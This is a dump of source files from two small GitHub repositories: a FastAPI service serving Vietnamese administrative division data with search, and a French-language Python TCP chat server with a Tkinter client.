python_version >= \"3.5\"\npy==1.10.0; python_version >= \"3.5\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.4.0\" and python_version >= \"3.5\"\npycodestyle==2.7.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\npydantic==1.8.2; python_full_version >= \"3.6.1\"\npyflakes==2.3.1; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.5.0\"\npygments==2.9.0; python_version >= \"3.5\"\npyparsing==2.4.7; python_version >= \"3.6\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.3.0\" and python_version >= \"3.6\"\npytest==5.4.3; python_version >= \"3.5\"\nrestructuredtext-lint==1.3.2\nsingle-version==1.5.1; python_version >= \"3.6\" and python_version < \"4.0\"\nsix==1.16.0; python_version >= \"2.7\" and python_full_version < \"3.0.0\" or python_full_version >= \"3.3.0\"\nstarlette==0.14.2; python_version >= \"3.6\"\nstevedore==3.3.0; python_version >= \"3.6\"\ntyping-extensions==3.10.0.0; python_full_version >= \"3.6.1\" and python_version >= \"3.6\" and python_version < \"3.8\"\nunidecode==1.2.0; (python_version >= \"2.7\" and python_full_version < \"3.0.0\") or (python_full_version >= \"3.4.0\")\nuvicorn==0.14.0\nvietnam-provinces==0.4.2; python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\nwcwidth==0.2.5; python_version >= \"3.5\"\nzipp==3.5.0; python_version >= \"3.6\" and python_version < \"3.8\" and python_full_version >= \"3.6.1\" and python_full_version < \"4.0.0\"\n" }, { "alpha_fraction": 0.6486486196517944, "alphanum_fraction": 0.6486486196517944, "avg_line_length": 17.5, "blob_id": "d99cf2ed767667f18f82acb4d79bef3b59aace9b", "content_id": "70a9344867a7cb3262cd9cbd5002d3d2f24425cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 74, "license_type": "no_license", "max_line_length": 38, "num_lines": 4, "path": "/content/examples/index.md", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "+++\ntitle = \"Province Open API - Examples\"\ntemplate = \"examples.html\"\n+++\n" }, { "alpha_fraction": 0.5603161454200745, "alphanum_fraction": 0.5661397576332092, "avg_line_length": 21.467288970947266, "blob_id": "9536c9fe2314785be5396bfe514ac7164937ffd9", "content_id": "28238d177e3d92d4e046d18b9300b993eb177f3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2416, "license_type": "no_license", "max_line_length": 108, "num_lines": 107, "path": "/api/schema.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from enum import Enum\nfrom typing import List, Dict, Tuple\n\nfrom pydantic import BaseModel, Field\n\nfrom vietnam_provinces.base import VietNamDivisionType\n\n\n# The code here looks like a duplicate of vietnam_provinces.base, but unfortunately, we cannot subclass from\n# vietnam_provinces.base's dataclasses, because:\n# - Ward is frozen (fastenum's restriction), it cannot be subclass\n# - FastAPI haven't supported dataclasses\n\n\nclass DivisionLevel(str, Enum):\n P = 'province'\n D = 'district'\n W = 'ward'\n\n\n_EXAMPLE_WARD = {\n 'name': 'Phường Phúc Xá',\n 'code': 1,\n 'division_type': 'phường',\n 'codename': 'phuong_phuc_xa',\n 'district_code': 1\n}\n\n\nclass Ward(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n district_code: int\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_WARD\n }\n\n\n_EXAMPLE_DISTRICT = {\n 'name': 'Quận Ba Đình',\n 'code': 1,\n 'division_type': 'quận',\n 'codename': 'quan_ba_dinh',\n 'province_code': 1,\n 'wards': [_EXAMPLE_WARD]\n}\n\n\nclass District(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n province_code: int\n wards: List[Ward] = Field(default=[])\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_DISTRICT\n }\n\n\n_EXAMPLE_PROVINCE = {\n 'name': 'Thành phố Hà Nội',\n 'code': 1,\n 'division_type': 'thành phố trung ương',\n 'codename': 'thanh_pho_ha_noi',\n 'phone_code': 24,\n 'districts': [_EXAMPLE_DISTRICT]\n}\n\n\nclass ProvinceResponse(BaseModel):\n name: str\n code: int\n division_type: VietNamDivisionType\n codename: str\n phone_code: int\n districts: List[District] = Field(default=[])\n\n class Config:\n schema_extra = {\n 'example': _EXAMPLE_PROVINCE\n }\n\n\nclass SearchResult(BaseModel):\n name: str\n code: int\n matches: Dict[str, Tuple[int, int]] = Field({}, title='Matched words and their positions in name.',\n description='This info can help client side highlight '\n 'the result in display.')\n\n class Config:\n schema_extra = {\n 'example': {\n 'name': 'Thị xã Phú Mỹ',\n 'code': 754,\n 'matches': {\n 'mỹ': [11, 13]\n },\n }\n }\n" }, { "alpha_fraction": 0.7155745625495911, "alphanum_fraction": 0.7155745625495911, "avg_line_length": 30.909090042114258, "blob_id": "2db0caacd54eca7950ef85beb6b83b0bfd56e888", "content_id": "a96fa8aeeb7ef42ea017424fdb3a88f235f3fa2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2106, "license_type": "no_license", "max_line_length": 212, "num_lines": 66, "path": "/README.rst", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "=====================\nViet Nam province API\n=====================\n\nHomepage: https://provinces.open-api.vn\n\nThis is online tool to let my VietnamProvinces_ library reach more users. VietnamProvinces_ is a Python library, so it can only be used in Python application.\nBy building an online tool on top of it, I hope to help Viet Nam standard data reach more application developers, easpecially web frontend application, where inclusion of big JSON file is not an optimized option.\nIn the end, it can help businesses collaborate better (by using the same standard data) and benefit people.\n\n\nThe online tool is built to run on Vercel_ platform, so that I don't have to pay for infrastructure, because this tool is FREE to use.\n\n\nDevelopment guide\n-----------------\n\nIf you want to join development, this is what you want to know:\n\nThe code consists of two parts:\n\n- Landing page: A static HTML page, built with Zola_. CSS is based on TailwindCSS_.\n- API backend: Written in Python_, based on FastAPI_ framework.\n\nAssume that you already install all dependencies.\n\n- To build landing page, run at the top-level folder:\n\n .. code-block:: sh\n\n zola build\n\n- To run the backend, run at the top-level folder:\n\n .. code-block:: sh\n\n uvicorn api.main:app\n\n- To serve the landing page and run the API backend at the same time, you can run this at the top-level folder:\n\n .. code-block:: sh\n\n npx vercel dev\n\n- If you modify HTML code in landing, chance that you are adding new CSS classes and you don't see update.\n It is because we configure TailwindCSS to delete all unused CSS classes. You need to build TailwindCSS again, let it scan used classes again.\n Doing so by running this command in *front-dev*:\n\n .. code-block:: sh\n\n yarn build-tailwind\n\n\nCredit\n------\n\nBrought to you by `Nguyễn Hồng Quân <author_>`_.\n\n\n.. _vercel: https://vercel.com\n.. _zola: https://www.getzola.org/\n.. _tailwindcss: https://tailwindcss.com/\n.. _python: https://www.python.org/\n.. _fastapi: https://fastapi.tiangolo.com/\n.. _author: https://quan.hoabinh.vn\n.. _VietnamProvinces: https://pypi.org/project/vietnam-provinces/\n" }, { "alpha_fraction": 0.4016145169734955, "alphanum_fraction": 0.41775983572006226, "avg_line_length": 19.64583396911621, "blob_id": "9678bd382a63c302b876579ff8f1700581c6bb10", "content_id": "786b18fd3f979471837fe2f696ea653605559187", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 991, "license_type": "no_license", "max_line_length": 44, "num_lines": 48, "path": "/front-dev/tailwind.config.js", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "const colors = require('tailwindcss/colors')\n\nmodule.exports = {\n purge: [\n '../templates/*.html',\n ],\n darkMode: false, // or 'media' or 'class'\n theme: {\n colors: {\n transparent: 'transparent',\n current: 'currentColor',\n ...colors,\n },\n extend: {\n typography: {\n DEFAULT: {\n css: {\n p: {\n marginTop: '0.75em',\n marginBottom: '0.75em',\n },\n pre: {\n marginTop: '1em',\n marginBottom: '1em',\n lineHeight: 1.5,\n fontSize: '0.75em',\n },\n img: {\n marginTop: '1em',\n marginBottom: '1em',\n },\n h2: {\n fontWeight: 'inherit'\n },\n }\n }\n }\n },\n },\n variants: {\n extend: {},\n },\n plugins: [\n require('@tailwindcss/forms'),\n require('@tailwindcss/aspect-ratio'),\n require('@tailwindcss/typography'),\n ],\n}\n" }, { "alpha_fraction": 0.4801200330257416, "alphanum_fraction": 0.5033758282661438, "avg_line_length": 13.811111450195312, "blob_id": "5f766752369bbf0040aec723182a34fdd8028a33", "content_id": "bace3c402ead3998b4443f8ee523a085398ff8dd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1353, "license_type": "no_license", "max_line_length": 56, "num_lines": 90, "path": "/content/_index.md", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "+++\ntitle = \"Province Open API\"\ntemplate = \"index.html\"\n+++\n\nVí dụ với [HTTPie](https://httpie.io/):\n\n#### Liệt kê:\n\n```sh\nhttp -v https://provinces.open-api.vn/api/ depth==2\n```\n\nRequest:\n\n```http\nGET /api/?depth=2 HTTP/1.1\nHost: provinces.open-api.vn\n```\n\nResponse:\n\n```http\nHTTP/1.1 200 OK\nConnection: keep-alive\nContent-Type: application/json\nTransfer-Encoding: chunked\n\n[\n {\n \"name\": \"Thành phố Hà Nội\",\n \"code\": 1,\n \"division_type\": \"thành phố trung ương\",\n \"phone_code\": 24,\n \"codename\": \"thanh_pho_ha_noi\",\n \"districts\": [\n {\n \"name\": \"Quận Ba Đình\",\n \"code\": 1,\n \"codename\": \"quan_ba_dinh\",\n \"division_type\": \"quận\",\n \"province_code\": 1,\n \"wards\": null\n },\n {\n \"name\": \"Quận Hoàn Kiếm\",\n \"code\": 2,\n \"codename\": \"quan_hoan_kiem\",\n \"division_type\": \"quận\",\n \"province_code\": 1,\n \"wards\": null\n },\n ...\n ]\n },\n ...\n]\n```\n\n#### Tìm kiếm:\n\n```sh\nhttp -v https://provinces.open-api.vn/api/d/search/ q==Y\n```\n\nRequest:\n\n```http\nGET /api/d/search/?q=Y HTTP/1.1\nHost: provinces.open-api.vn\n```\n\nResponse:\n\n```http\nHTTP/1.1 200 OK\nContent-Type: application/json\ncontent-length: 71\n\n[\n {\n \"name\": \"Huyện Ý Yên\",\n \"code\": 360,\n \"matches\": {\n \"y\": [6, 7]\n },\n \"score\": 6\n }\n]\n```\n" }, { "alpha_fraction": 0.6557350158691406, "alphanum_fraction": 0.6627508401870728, "avg_line_length": 36.601226806640625, "blob_id": "992f256cf2cdc7125153fbbb2579630dd43237d7", "content_id": "9173aa9284d1491bad4d6aea04408bf07f17ad26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6129, "license_type": "no_license", "max_line_length": 118, "num_lines": 163, "path": "/api/main.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from dataclasses import asdict\nfrom itertools import groupby\nfrom operator import attrgetter\nfrom collections import deque\nfrom typing import List, FrozenSet, Dict, Any, Optional\n\nfrom logbook import Logger\nfrom logbook.more import ColorizedStderrHandler\nfrom fastapi import FastAPI, APIRouter, Query, HTTPException, Request\nfrom fastapi.responses import FileResponse\nfrom pydantic import BaseSettings\nfrom fastapi_rfc7807 import middleware\nfrom lunr.exceptions import QueryParseError\n\nfrom vietnam_provinces import NESTED_DIVISIONS_JSON_PATH\nfrom vietnam_provinces.enums import ProvinceEnum, DistrictEnum\nfrom vietnam_provinces.enums.wards import WardEnum\n\nfrom . import __version__\nfrom .schema import ProvinceResponse, District as DistrictResponse, Ward as WardResponse, SearchResult\nfrom .search import Searcher\n\n\nclass Settings(BaseSettings):\n tracking: bool = False\n cdn_cache_interval: int = 30\n\n\nlogger = Logger(__name__)\napp = FastAPI(title='Vietnam Provinces online API', version=__version__)\napi = APIRouter()\nsettings = Settings()\nmiddleware.register(app)\nrepo = Searcher()\nColorizedStderrHandler().push_application()\n\n\nSearchResults = List[SearchResult]\nSearchQuery = Query(..., title='Query string for search', example='Hiền Hòa',\n description='Follow [lunr](https://lunr.readthedocs.io/en/latest/usage.html#using-query-strings)'\n ' syntax.')\n\n\[email protected]('/', response_model=List[ProvinceResponse])\nasync def show_all_divisions(depth: int = Query(1, ge=1, le=3,\n title='Show down to subdivisions',\n description='2: show districts; 3: show wards')):\n if depth >= 3:\n return FileResponse(NESTED_DIVISIONS_JSON_PATH)\n if depth == 2:\n provinces = deque()\n for k, group in groupby(DistrictEnum, key=attrgetter('value.province_code')):\n p = asdict(ProvinceEnum[f'P_{k}'].value)\n p['districts'] = tuple(asdict(d.value) for d in group)\n provinces.append(p)\n return provinces\n return tuple(asdict(p.value) for p in ProvinceEnum)\n\n\[email protected]('/p/', response_model=List[ProvinceResponse])\nasync def list_provinces():\n return tuple(asdict(p.value) for p in ProvinceEnum)\n\n\[email protected]('/p/search/', response_model=SearchResults)\nasync def search_provinces(q: str = SearchQuery):\n try:\n res = repo.search_province(q)\n return res\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/p/{code}', response_model=ProvinceResponse)\nasync def get_province(code: int,\n depth: int = Query(1, ge=1, le=3, title='Show down to subdivisions',\n description='2: show districts; 3: show wards')):\n try:\n province = ProvinceEnum[f'P_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-province-code')\n response = asdict(province)\n districts = {}\n if depth >= 2:\n districts: Dict[int, Dict[str, Any]] = {d.value.code: asdict(d.value)\n for d in DistrictEnum if d.value.province_code == code}\n if depth == 3:\n district_codes: FrozenSet[int] = frozenset(districts.keys())\n for k, group in groupby(WardEnum, key=attrgetter('value.district_code')):\n if k not in district_codes:\n continue\n districts[k]['wards'] = tuple(asdict(w.value) for w in group)\n response['districts'] = tuple(districts.values())\n return response\n\n\[email protected]('/d/', response_model=List[DistrictResponse])\nasync def list_districts():\n return tuple(asdict(d.value) for d in DistrictEnum)\n\n\[email protected]('/d/search/', response_model=SearchResults)\nasync def search_districts(q: str = SearchQuery,\n p: Optional[int] = Query(None, title='Province code to filter')):\n try:\n return repo.search_district(q, p)\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/d/{code}', response_model=DistrictResponse)\nasync def get_district(code: int,\n depth: int = Query(1, ge=1, le=2, title='Show down to subdivisions',\n description='2: show wards')):\n try:\n district = DistrictEnum[f'D_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-district-code')\n response = asdict(district)\n if depth == 2:\n response['wards'] = tuple(asdict(w.value) for w in WardEnum if w.value.district_code == code)\n return response\n\n\[email protected]('/w/', response_model=List[WardResponse])\nasync def list_wards():\n return tuple(asdict(w.value) for w in WardEnum)\n\n\[email protected]('/w/search/', response_model=SearchResults)\nasync def search_wards(q: str = SearchQuery,\n d: Optional[int] = Query(None, title='District code to filter'),\n p: Optional[int] = Query(None, title='Province code to filter, ignored if district is given')):\n try:\n return repo.search_ward(q, d, p)\n except QueryParseError:\n raise HTTPException(status_code=422, detail='unrecognized-search-query')\n\n\[email protected]('/w/{code}', response_model=WardResponse)\nasync def get_ward(code: int):\n try:\n ward = WardEnum[f'W_{code}'].value\n except (KeyError, AttributeError):\n raise HTTPException(404, detail='invalid-ward-code')\n return asdict(ward)\n\n\napp.include_router(api, prefix='/api')\n\n\[email protected]('http')\nasync def guide_cdn_cache(request: Request, call_next):\n response = await call_next(request)\n # Ref: https://vercel.com/docs/edge-network/headers#cache-control-header\n response.headers['Cache-Control'] = f's-maxage={settings.cdn_cache_interval}, stale-while-revalidate'\n return response\n\n\n# Vercel ASGI server doesn't support \"startup\" event, so we have to run this code in global\nlogger.debug('To build search index')\nrepo.build_index()\nlogger.debug('Ready to search')\n" }, { "alpha_fraction": 0.7364864945411682, "alphanum_fraction": 0.7364864945411682, "avg_line_length": 23.66666603088379, "blob_id": "4ce646b43624886245ea76adac8e43b8402ff7a9", "content_id": "b49efc2b6c87e23f6d41b823850844a5eb3cdd91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 148, "license_type": "no_license", "max_line_length": 80, "num_lines": 6, "path": "/api/__init__.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom single_version import get_version\n\n\n__version__ = get_version('vn-open-api-provinces', Path(__file__).parent.parent)\n" }, { "alpha_fraction": 0.5879529714584351, "alphanum_fraction": 0.5884329080581665, "avg_line_length": 40.25742721557617, "blob_id": "51da96071ded2b632fc63b0b4e512a4e1919ff16", "content_id": "908451e762ab0ae70fdde8b213de6232838246d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4167, "license_type": "no_license", "max_line_length": 112, "num_lines": 101, "path": "/api/search.py", "repo_name": "ngoc-tuyen/vn-open-api-provinces", "src_encoding": "UTF-8", "text": "import re\nfrom typing import Optional, Dict, Union, Tuple, List, Any\n\nfrom lunr import lunr\nfrom lunr.index import Index\nfrom logbook import Logger\nfrom unidecode import unidecode\nfrom vietnam_provinces import Province, District, Ward\nfrom vietnam_provinces.enums import ProvinceEnum, DistrictEnum\nfrom vietnam_provinces.enums.wards import WardEnum\n\nfrom .schema import DivisionLevel, SearchResult\n\n\nlogger = Logger(__name__)\n\n\ndef to_search_doc(obj: Union[Province, District, Ward]):\n doc = {\n 'code': obj.code,\n 'name': obj.name\n }\n doc['stripped_name'] = unidecode(doc['name'])\n return doc\n\n\nclass Searcher:\n ready = False\n province_index: Optional[Index] = None\n district_index: Optional[Index] = None\n ward_index: Optional[Index] = None\n\n def build_index(self):\n self.province_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in ProvinceEnum))\n self.district_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in DistrictEnum))\n self.ward_index = lunr(ref='code', fields=('name', 'stripped_name'),\n documents=tuple(to_search_doc(p.value) for p in WardEnum))\n self.ready = True\n\n def search(self, query: str, level: DivisionLevel = DivisionLevel.P,\n district_code: Optional[int] = None,\n province_code: Optional[int] = None) -> Tuple[SearchResult, ...]:\n if not self.ready:\n logger.warning('Index building does not finished yet!')\n return []\n if level == DivisionLevel.P:\n lresults: List[Dict[str, Any]] = self.province_index.search(query)\n elif level == DivisionLevel.D:\n lresults: List[Dict[str, Any]] = self.district_index.search(query)\n else:\n lresults: List[Dict[str, Any]] = self.ward_index.search(query)\n if not lresults:\n return []\n # Lunrpy sometimes returns duplicate-like results\n # (same ref but different matches and scores). We will combine those.\n dresults = {}\n for r in lresults:\n code = int(r['ref'])\n for term, fields in r['match_data'].metadata.items():\n if level == DivisionLevel.P:\n obj: Province = ProvinceEnum[f'P_{code}'].value\n elif level == DivisionLevel.D:\n obj: District = DistrictEnum[f'D_{code}'].value\n if province_code and obj.province_code != province_code:\n continue\n else:\n obj: Ward = WardEnum[f'W_{code}'].value\n if district_code and obj.district_code != district_code:\n continue\n elif province_code:\n dist: District = DistrictEnum[f'D_{obj.district_code}'].value\n if dist.province_code != province_code:\n continue\n # Find position of matched keyword, to help highlighting\n matches = {}\n matches[term] = locate(obj.name, term)\n try:\n dresults[code].matches.update(matches)\n except KeyError:\n dresults[code] = SearchResult(code=code, name=obj.name, matches=matches)\n return tuple(dresults.values())\n\n def search_province(self, query: str):\n return self.search(query, DivisionLevel.P)\n\n def search_district(self, query: str, province_code: Optional[int] = None):\n return self.search(query, DivisionLevel.D, province_code=province_code)\n\n def search_ward(self, query: str, district_code: Optional[int] = None, province_code: Optional[int] = None):\n return self.search(query, DivisionLevel.W, district_code, province_code)\n\n\ndef locate(name: str, term: str):\n name = unidecode(name).lower()\n term = unidecode(term).lower()\n m = re.search(rf'\\b{term}\\b', name)\n if not m:\n raise ValueError\n return (m.start(0), m.end(0))\n" } ]
11
billythegoat356/TCP_Chat
https://github.com/billythegoat356/TCP_Chat
b98aa55c2f1b6e5d644e590bb13487656df6e5b8
be6cc185f1860b38ee4e2a0a833a49bf2bf4f6fb
b098ee972c09b3de7b432145e75c345bef14f5ce
refs/heads/main
2023-06-23T03:12:17.733673
2021-07-25T13:26:33
2021-07-25T13:26:33
387,459,663
25
3
null
null
null
null
null
[ { "alpha_fraction": 0.5226321220397949, "alphanum_fraction": 0.5345368981361389, "avg_line_length": 22.421724319458008, "blob_id": "831201726e622d7d8d8ae85726751d8449e36eda", "content_id": "b3871f59ec8c35915293cd448aeb5dbc482c6079", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7649, "license_type": "permissive", "max_line_length": 127, "num_lines": 313, "path": "/CLIENT/client.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\nimport tkinter as tk\r\n\r\nfrom json import dumps, loads\r\nfrom threading import Thread\r\nfrom os import system, name\r\nfrom time import sleep\r\n\r\n\r\nsystem(\"\")\r\n\r\n\r\ndef clear():\r\n system(\"cls\" if name == 'nt' else \"clear\")\r\n\r\n\r\nhost, port = 'localhost', 8500\r\n\r\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n\r\n\r\nclass Colors:\r\n \r\n def print(self, color, text) -> str:\r\n return \"\\033[38;2;{}m{}\\033[38;2;255;255;255m\".format(color, text)\r\n\r\n def red(self, text) -> str:\r\n return self.print('255;0;0', text)\r\n\r\n def green(self, text) -> str:\r\n return self.print('0;255;0', text)\r\n\r\n def blue(self, text) -> str:\r\n return self.print('0;0;255', text)\r\n\r\n\r\n\r\nclass Client:\r\n\r\n def __init__(self, socket):\r\n\r\n \r\n\r\n window = tk.Tk()\r\n self.window = window\r\n\r\n window.title(\"Chat\")\r\n\r\n geometry = self.tkinter_screen_set(400, 300)\r\n \r\n window.geometry(geometry)\r\n window.resizable(width=False, height=False)\r\n window.configure(background=\"black\")\r\n\r\n\r\n self.var = var = tk.StringVar()\r\n var.set(\"Connexion au serveur en cours...\")\r\n\r\n self.main_label = main_label = tk.Label(window, textvariable=var)\r\n\r\n\r\n main_label.pack()\r\n\r\n main_thread = Thread(target=self.tkinter)\r\n main_thread.start()\r\n\r\n\r\n self.window.mainloop()\r\n\r\n def tkinter(self):\r\n\r\n\r\n while True:\r\n try:\r\n socket.connect((host, port))\r\n except ConnectionRefusedError:\r\n self.var.set(\"Erreur lors de la connexion au serveur. Tentative de reconnexionen cours...\")\r\n continue\r\n break\r\n\r\n self.var.set(\"Récupération de l'identifiant...\")\r\n\r\n self.socket = socket\r\n id = socket.recv(1024).decode('utf-8')\r\n\r\n self.id = id\r\n\r\n\r\n\r\n\r\n\r\n if not id:\r\n self.var.set(\"Le serveur est hors ligne. Réessayez plus tard.\")\r\n disconnect_button = tk.Button(self.window(), text=\"Quitter\", command=self.tkinter_exit_button).pack()\r\n input()\r\n\r\n \r\n self.var.set(\"Votre ID est: {}\".format(id))\r\n\r\n sleep(2.5)\r\n\r\n self.window.title(\"Chat - ID: {}\".format(id))\r\n \r\n self.set_username()\r\n\r\n self.connect()\r\n\r\n\r\n def set_username(self):\r\n self.username = None\r\n\r\n self.var.set(\"Entrez votre pseudo:\")\r\n\r\n self.username_entry = username_entry = tk.Entry(self.window)\r\n username_button = tk.Button(self.window, text=\"Confirmer\", command=self.tkinter_username_button)\r\n \r\n username_entry.pack()\r\n username_button.pack()\r\n\r\n while True:\r\n if self.username is not None:\r\n break\r\n\r\n username_button.pack_forget()\r\n\r\n self.var.set(\"Votre pseudo est: {}\".format(self.username))\r\n\r\n sleep(2.5)\r\n\r\n self.window.title(\"Chat - ID: {} - Pseudo: {}\".format(self.id, self.username))\r\n\r\n data = {'name':self.username}\r\n self.send(data)\r\n\r\n\r\n def connect(self):\r\n\r\n\r\n self.connected = None\r\n\r\n self.var.set(\"Entrez l'ID de l'utilisateur auquel vous voulez vous connecter:\")\r\n\r\n self.connect_button = connect_button = tk.Button(self.window, text=\"Se connecter\", command=self.tkinter_connect_button)\r\n connect_button.pack()\r\n\r\n while True:\r\n if self.connected is not None:\r\n break\r\n\r\n\r\n self.var.set(self.connected)\r\n\r\n if self.connected == \"Waiting for connection...\":\r\n self.username_entry.pack_forget()\r\n connect_button.pack_forget()\r\n while True:\r\n resp = self.socket.recv(1024).decode('utf-8')\r\n if resp:\r\n self.var.set(resp)\r\n break\r\n \r\n if self.username_entry.winfo_ismapped() and connect_button.winfo_ismapped():\r\n self.username_entry.pack_forget()\r\n connect_button.pack_forget()\r\n\r\n\r\n\r\n self.tkinter_chat()\r\n\r\n\r\n\r\n def tkinter_chat(self):\r\n\r\n self.window.geometry(\"1200x800\")\r\n\r\n self.tkinter_chat_entry()\r\n\r\n self.tkinter_chat_button()\r\n\r\n recv_thread = Thread(target=self.tkinter_chat_recv)\r\n\r\n recv_thread.start()\r\n\r\n recv_thread.join()\r\n\r\n\r\n\r\n def send(self, data):\r\n try:\r\n self.socket.send(dumps(data).encode('utf-8'))\r\n except:\r\n return self.disconnect()\r\n\r\n\r\n def disconnect(self):\r\n try:\r\n self.socket.disconnect()\r\n except:\r\n pass\r\n return exit()\r\n \r\n\r\n def tkinter_chat_entry(self):\r\n text = tk.Entry(self.window)\r\n self.text = text\r\n\r\n text.pack(expand=True)\r\n \r\n def tkinter_chat_button(self):\r\n button = tk.Button(self.window, text=\"Envoyer\", command=self.tkinter_chat_send)\r\n self.button = button\r\n \r\n button.pack(expand=True)\r\n\r\n def tkinter_chat_send(self):\r\n content = self.text.get()\r\n\r\n if content == \"\":\r\n return\r\n\r\n data = {'message':content}\r\n\r\n try:\r\n self.send(data)\r\n except:\r\n return self.disconnect()\r\n\r\n self.text.delete(first=0, last=len(self.text.get()))\r\n\r\n self.var.set(self.var.get() + '\\n' + \"{}: {}\".format(self.username, content))\r\n\r\n def tkinter_chat_recv(self):\r\n while True:\r\n try:\r\n data = loads(socket.recv(1024).decode('utf-8'))\r\n except:\r\n return self.disconnect()\r\n\r\n for username in data['message']:\r\n self.var.set(self.var.get() + '\\n' + username + \": \" + data['message'][username])\r\n break\r\n \r\n \r\n def tkinter_username_button(self):\r\n username = self.username_entry.get()\r\n\r\n self.username_entry.delete(first=0, last=len(self.username_entry.get()))\r\n\r\n if len(username) < 3:\r\n self.var.set(\"Pseudo trop court! (min. 3)\")\r\n \r\n elif len(username) > 10:\r\n self.var.set(\"Pseudo trop long! (max. 10)\")\r\n \r\n else:\r\n self.username = username\r\n \r\n def tkinter_connect_button(self):\r\n content = self.username_entry.get()\r\n\r\n self.username_entry.delete(first=0, last=len(self.username_entry.get()))\r\n\r\n if content == self.id:\r\n self.connectino_error(\r\n \"Tu ne peux pas te connecter à toi même xD\"\r\n )\r\n\r\n data = {'connect':content}\r\n self.send(data)\r\n\r\n response = self.socket.recv(1024).decode('utf-8')\r\n\r\n if response == 'invalid id':\r\n self.connectino_error(\"ID invalide!\")\r\n else:\r\n self.var.set(response)\r\n self.connected = response\r\n\r\n def connectino_error(self, text):\r\n self.var.set(text)\r\n self.username_entry.pack_forget()\r\n self.connect_button.pack_forget()\r\n disconnect_button = tk.Button(self.window(), text=\"Quitter\", command=self.tkinter_exit_button).pack()\r\n input()\r\n\r\n\r\n\r\n\r\n def tkinter_screen_set(self, window_x, window_y):\r\n screen_x, screen_y = self.window.winfo_screenwidth(), self.window.winfo_screenheight()\r\n \r\n x = screen_x / 2 + window_x / 2\r\n y = screen_y / 2 + window_y / 2\r\n\r\n return \"{}x{}+{}+{}\".format(window_x, window_y, int(x), int(y))\r\n\r\n def tkinter_exit_button(self):\r\n return self.disconnect()\r\n\r\n\r\n\r\ndef main():\r\n\r\n\r\n client = Client(socket)\r\n\r\n\r\n socket.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" }, { "alpha_fraction": 0.5969429016113281, "alphanum_fraction": 0.607401430606842, "avg_line_length": 13.320987701416016, "blob_id": "743ec2b528411872d439dcbd115f48ab246d8b01", "content_id": "b3a6d12650a88c40f9298aa0f6dcdc2a6e3e8727", "detected_licenses": [ "CC0-1.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1243, "license_type": "permissive", "max_line_length": 58, "num_lines": 81, "path": "/SERVER/server.py", "repo_name": "billythegoat356/TCP_Chat", "src_encoding": "UTF-8", "text": "import socket\r\n\r\nfrom threading import Thread\r\nfrom json import dumps\r\nfrom random import randint\r\n\r\nfrom src.client import Client, clients\r\n\r\n\r\nhost, port = '', 8500\r\n\r\n\r\n\r\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n\r\nsocket.bind((host, port))\r\nprint(\"Le serveur est en ligne!\")\r\n\r\n\r\n\r\ndef client_start(conn, addr, surplus=0):\r\n\r\n client_number = randint(100, 1000) + surplus\r\n\r\n\r\n if client_number in clients:\r\n return client_start(conn, addr, client_number)\r\n\r\n return client_thread_start(conn, addr, client_number)\r\n\r\n\r\n\r\ndef client_thread_start(conn, addr, client_number):\r\n\r\n try:\r\n conn.send(str(client_number).encode('utf-8'))\r\n Client(client_number, conn, addr)\r\n except:\r\n pass\r\n \r\n return client_number\r\n\r\n\r\n\r\n\r\ndef listen():\r\n socket.listen()\r\n conn, addr = socket.accept()\r\n\r\n client_start(conn, addr)\r\n return listen()\r\n\r\n\r\ndef stop_loop():\r\n stop = input(\"\")\r\n if stop == 'y':\r\n socket.close()\r\n \r\n return stop_loop()\r\n\r\n\r\n\r\n\r\n\r\nloop = Thread(target=listen)\r\nstop_thread = Thread(target=stop_loop)\r\n\r\nloop.start()\r\nstop_thread.start()\r\n\r\n\r\n\r\nloop.join()\r\n\r\n\r\n\r\nfor client in clients:\r\n 